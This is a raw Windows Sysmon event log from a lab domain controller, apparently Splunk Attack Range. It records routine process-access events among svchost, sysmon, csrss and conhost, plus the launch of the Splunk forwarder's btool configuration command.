13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4299-6000-4800-000000009A01}2596C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4800-000000009A01}2596C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4299-6000-4700-000000009A01}40923172C:\Windows\system32\cmd.exe{08A6967A-4299-6000-4800-000000009A01}2596C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4299-6000-4800-000000009A01}2596C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4299-6000-4700-000000009A01}4092C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.915{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 